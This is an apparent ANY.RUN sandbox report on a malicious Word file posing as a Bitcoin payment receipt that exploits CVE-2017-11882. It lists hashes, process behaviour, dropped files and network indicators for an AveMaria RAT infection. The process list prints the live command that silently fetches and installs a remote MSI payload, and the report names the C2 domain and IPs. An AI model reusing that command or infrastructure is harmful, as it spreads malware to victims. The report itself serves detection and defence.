analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

BTC_payment_receipt.docx

Full analysis: https://app.any.run/tasks/035670d3-3f38-44d5-91b3-fa2f1661d850
Verdict: Malicious activity
Analysis date: May 20, 2019, 09:23:49
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
generated-doc
exploit
CVE-2017-11882
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

2D49AC3E13B74DF4C3892E6889AB2E21

SHA1:

F1A360822C2828F9165143CA59E1C67837671903

SHA256:

FDEC22B9DE8580661228149F50D3207605372FA0F880C2B45D05F715702B1F7D

SSDEEP:

384:X6ma3W6PYcpf4MS+pG7hvWvRG95OQJJflgI4yFJexEtxI:qmURPYchg5mRG95OQJJfWxTiI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 1332)
    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3352)
    • Application was dropped or rewritten from another process

      • images.exe (PID: 3316)
      • images.exe (PID: 4084)
    • Application was injected by another process

      • explorer.exe (PID: 2036)
    • Runs injected code in another process

      • images.exe (PID: 4084)
    • Changes the autorun value in the registry

      • MSIACE5.tmp (PID: 1500)
    • Connects to CnC server

      • images.exe (PID: 4084)
  • SUSPICIOUS

    • Executed via COM

      • EQNEDT32.EXE (PID: 3352)
      • EQNEDT32.EXE (PID: 2300)
    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3352)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3204)
      • MSIACE5.tmp (PID: 1500)
    • Starts itself from another location

      • MSIACE5.tmp (PID: 1500)
    • Creates files in the user directory

      • MSIACE5.tmp (PID: 1500)
    • Application launched itself

      • images.exe (PID: 3316)
    • Reads the machine GUID from the registry

      • images.exe (PID: 4084)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2860)
    • Starts Microsoft Office Application

      • explorer.exe (PID: 2036)
    • Reads settings of System Certificates

      • WINWORD.EXE (PID: 2860)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2860)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3352)
    • Application was dropped or rewritten from another process

      • MSIACE5.tmp (PID: 1500)
      • MSIACE5.tmp (PID: 1076)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3204)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3204)
      • MSIACE5.tmp (PID: 1076)
    • Application launched itself

      • MSIACE5.tmp (PID: 1076)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x2c2fab17
ZipCompressedSize: 350
ZipUncompressedSize: 1364
ZipFileName: [Content_Types].xml

XML

Template: template.dotx
TotalEditTime: -
Pages: 1
Words: -
Characters: 1
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
HeadingPairs:
  • Title
  • 1
TitlesOfParts: -
Company: -
LinksUpToDate: No
CharactersWithSpaces: 1
SharedDoc: No
HyperlinksChanged: No
AppVersion: 15
Keywords: -
LastModifiedBy: Richard
RevisionNumber: 2
CreateDate: 2019:05:16 12:01:00Z
ModifyDate: 2019:05:16 12:01:00Z

XMP

Title: -
Subject: -
Creator: Richard
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
11
Malicious processes
3
Suspicious processes
3

Behavior graph

Click at the process to see the details
start drop and start drop and start inject winword.exe eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe eqnedt32.exe no specs msiace5.tmp no specs msiace5.tmp images.exe no specs images.exe explorer.exe

Process information

PID
CMD
Path
Indicators
Parent process
2860"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\BTC_payment_receipt.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3352"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
1332cmd.exe & /C CD C: & msiexec.exe /i https://servers.intlde.com/protected.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3720msiexec.exe /i https://servers.intlde.com/protected.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3204C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2300"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
1076"C:\Windows\Installer\MSIACE5.tmp"C:\Windows\Installer\MSIACE5.tmpmsiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1500"C:\Windows\Installer\MSIACE5.tmp"C:\Windows\Installer\MSIACE5.tmp
MSIACE5.tmp
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3316"C:\Users\admin\AppData\Roaming\images.exe"C:\Users\admin\AppData\Roaming\images.exeMSIACE5.tmp
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
4084"C:\Users\admin\AppData\Roaming\images.exe"C:\Users\admin\AppData\Roaming\images.exe
images.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221225477
Total events
1 479
Read events
967
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
26
Text files
15
Unknown types
5

Dropped files

PID
Process
Filename
Type
2860WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE9E.tmp.cvr
MD5:
SHA256:
2860WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{85F0AC0B-F0BC-4CCC-A72E-3750D7276A21}
MD5:
SHA256:
2860WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{E2A6B24E-EC80-4F06-AE65-43D6A560BBD2}
MD5:
SHA256:
2860WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{A77AE0F8-5159-4FE0-95B8-30460B20C291}.FSDbinary
MD5:4F157AEF84D6A1E3FC9D79300090691F
SHA256:9EE9296DC1E0749A704D0614862E404FBB2D052B160BBB0930514114B13E00F8
2860WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:AAE1F34939203117AC1F4B1DA330748D
SHA256:A8522EFD13191ED100712611DBB7B818993A3A9AEE4584A1360605C4D2C4BD74
2860WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSFbinary
MD5:32D5D9A57144E4DFD99C0790F3F28956
SHA256:1B1B8ADD35E4851D2FBCEAD36584D24674AE6944A7DA014F48D736275C051952
2860WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDbinary
MD5:4769BD793DA17E53B02E07A2A9E8460D
SHA256:95836375737ED76B1DBC98ABD76832D6FD0428DFBA38C52BDFF4D3A99FD71B28
2860WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$C_payment_receipt.docxpgc
MD5:B864F8135F710688BA866D1B7770FC1C
SHA256:2A0DFC51F7389EBD39134D6C3F18B582CC5ED47EBD79235FB78D6B5D3AB36A0B
2860WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSDbinary
MD5:62FB34E5F59419A10E53B86FDEA71399
SHA256:A160F063FC7160FC272346D5B2EDC546ADA599E19D35D71423F03D94577B1252
3204msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF00D8A0E94843035D.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
10
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2860
WINWORD.EXE
198.252.108.62:443
servers.intlde.com
Hawk Host Inc.
CA
unknown
3204
msiexec.exe
198.252.108.62:443
servers.intlde.com
Hawk Host Inc.
CA
unknown
88.202.177.235:5200
fada101.servehttp.com
UK-2 Limited
NL
malicious
980
svchost.exe
198.252.108.62:443
servers.intlde.com
Hawk Host Inc.
CA
unknown

DNS requests

Domain
IP
Reputation
servers.intlde.com
  • 198.252.108.62
unknown
fada101.servehttp.com
  • 88.202.177.235
malicious

Threats

PID
Process
Class
Message
4084
images.exe
A Network Trojan was detected
MALWARE [PTsecurity] AveMaria.RAT Encrypted Checkin
No debug info